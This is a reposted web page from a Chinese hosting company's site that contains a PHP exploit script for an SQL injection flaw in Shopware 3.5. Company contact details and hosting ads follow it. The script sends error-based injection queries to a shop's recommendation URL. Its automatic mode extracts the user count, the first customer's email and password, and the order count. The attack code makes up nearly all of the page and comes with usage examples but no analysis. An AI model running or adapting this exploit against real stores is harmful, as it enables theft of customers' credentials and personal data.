|
Shopware 3.5 – SQL注入漏洞
直接貼出代碼
function http_req($host, $q)
{
if(!$fs = fsockopen($host, 80))
exit(“Could not open HTTP- Connection to “.$host.”\r\n\r\n”);
$head = “GET /recommendation/bought/Article/”.urlencode(“0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (“.$q.”) FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)”).” HTTP/1.1\r\n”;
$head .= “Host: “.$host.”\r\n”;
$head .= “Connection: Close\r\n\r\n”;
fwrite($fs, $head);
$ret = ”;
while(!feof($fs))
$ret .= fgets($fs, 4096);
fclose($fs);
return $ret;
}
function mask($cont)
{
if(preg_match(‘/Duplicate entry \’(.*)1\’ for/’, $cont, $m))
return $m[1];
else
return false;
}
function space($x)
{
$r = ”;
for($i = 0; $i < $x; $i++)
$r .= ‘ ‘;
return $r;
}
echo “\r\nExploit Title: Shopware 3.5 – SQL Injection\r\n”;
echo “Date: 13.07.2012\r\n”;
echo “Exploit Author: Kataklysmos\r\n”;
echo “Software Link: http://www.shopware.de/\r\n”;
echo “Version: 3.5\r\n\r\n”;
if(!isset($argv[2]))
{
echo ” Usage: \r\n”;
echo ” “.$argv[0].” HOST –auto\r\n”;
echo ” “.$argv[0].” www.shopwaredemo.de –auto\r\n\r\n”;
echo ” “.$argv[0].” HOST QUERY\r\n”;
echo ” “.$argv[0].” www.shopwaredemo.de \”SELECT COUNT(`id`) FROM `s_user`\”\r\n”;
echo ” “.$argv[0].” www.shopwaredemo.de \”SELECT `email` FROM `s_user` LIMIT 0,1\”\r\n\r\n”;
exit(1);
}
if($argv[2] != ‘–auto’)
{
$x = http_req($argv[1], $argv[2]);
if(!$x = mask($x))
exit(“Your query failed!\r\n\r\n”);
echo “Query:\r\n “.$argv[2].”\r\nReturn:\r\n “.$x.”\r\n\r\n”;
}
else
{
$task = array(array(‘Amount of registered users’, ‘SELECT COUNT(`id`) FROM `s_user`’, null),
array(‘E- Mail from first user’, ‘SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1′, null),
array(‘Password from first user’, ‘SELECT `password` FROM `s_user` LIMIT 0,1′, null),
array(‘Amount of orders’, ‘SELECT COUNT(`id`) FROM `s_order`’, null)
);
for($i = 0; $i < count($task); $i++)
{
echo “[ .. ] Task: \”".$task[$i][0].”\”";
$x = http_req($argv[1], $task[$i][1]);
if(!$x = mask($x))
echo “\r[fail] Task: \”".$task[$i][0].”\”\r\n”;
else
{
echo “\r[ ok ] Task: \”".$task[$i][0].”\”\r\n”;
$task[$i][2] = $x;
}
}
echo “\r\n”;
for($i = 0; $i < count($task); $i++)
echo $task[$i][0].space(26-strlen($task[$i][0])).’ : ‘.$task[$i][2].”\r\n”;
echo “\r\n”;
}
?>
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
本文出自:億恩科技【www.enidc.com】
-->
服務器租用/服務器托管中國五強�!虛擬主機域名注冊頂級提供商�����!15年品質(zhì)保障�����!--億恩科技[ENKJ.COM]
|
香港服務器租用
美國服務器租用
電信骨干機房
聯(lián)通骨干機房
0371-60135900
